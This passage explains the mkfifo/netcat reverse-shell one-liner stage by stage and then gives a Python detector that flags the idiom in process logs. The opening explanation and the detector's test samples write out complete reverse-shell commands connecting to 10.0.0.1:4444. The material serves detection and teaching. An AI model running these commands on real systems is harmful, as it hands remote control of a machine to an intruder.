        3. cat /tmp/f | /bin/bash -i 2>&1 | nc IP port >/tmp/f
                cat /tmp/f: read the newly created pipe and pass its contents to the next command through the pipeline
                /bin/bash -i 2>&1 | nc IP port >/tmp/f: run the command received in the previous step in an interactive bash, send the result to the remote host over nc, and write the remote host's next command back into the pipe f.
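The structure just explained (FIFO created, shell reading from it, network client writing back into it) is also what a detection should key on. The following is an added example, not from the original post, that flags the idiom in process command lines (auditd EXECVE records, EDR process events); the samples are constructed.

```python
"""Flag the mkfifo/nc reverse-shell idiom explained above in process command
lines (auditd EXECVE records, EDR process events, shell history).

Added detection example, not part of the original post. It matches the
structure of the chain rather than one literal string: a FIFO is created,
a shell reads commands from it, and a network client writes back into it.
"""
import re
import shlex

_SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
_NET_CLIENTS = {"nc", "ncat", "netcat", "socat", "telnet"}


def _stages(cmdline):
    """Split a shell command line into stages on ';', '|', '&&' and '||'."""
    return [s.strip() for s in re.split(r"\|\||&&|[;|]", cmdline) if s.strip()]


def is_fifo_reverse_shell(cmdline):
    fifo_paths, reads_fifo, has_shell, writes_fifo = set(), False, False, False
    for stage in _stages(cmdline):
        try:
            argv = shlex.split(stage)
        except ValueError:          # unbalanced quotes: fall back to whitespace split
            argv = stage.split()
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        if prog == "mkfifo":
            fifo_paths.update(argv[1:])
            continue
        touches_fifo = any(p in stage for p in fifo_paths)
        if touches_fifo and (prog == "cat" or prog in _SHELLS):
            reads_fifo = True       # 'cat /tmp/f | sh -i' or 'sh -i < /tmp/f'
        if prog in _SHELLS:
            has_shell = True
        if touches_fifo and prog in _NET_CLIENTS and ">" in stage:
            writes_fifo = True      # 'nc host port > /tmp/f' closes the loop
    return bool(fifo_paths) and reads_fifo and has_shell and writes_fifo


# Constructed samples: the first two are the idiom from the summary above, the
# rest are benign FIFO / netcat uses that must not trigger.
SAMPLES = {
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 4444 > /tmp/f": True,
    "mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.0.0.1 4444 >/tmp/f": True,
    "mkfifo /tmp/pipe && gzip -c < /tmp/pipe > logs.gz & tar cf /tmp/pipe /var/log": False,
    "cat /etc/hostname | nc 10.0.0.1 4444": False,
    "nc -l -p 8080 > /tmp/out": False,
}
```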
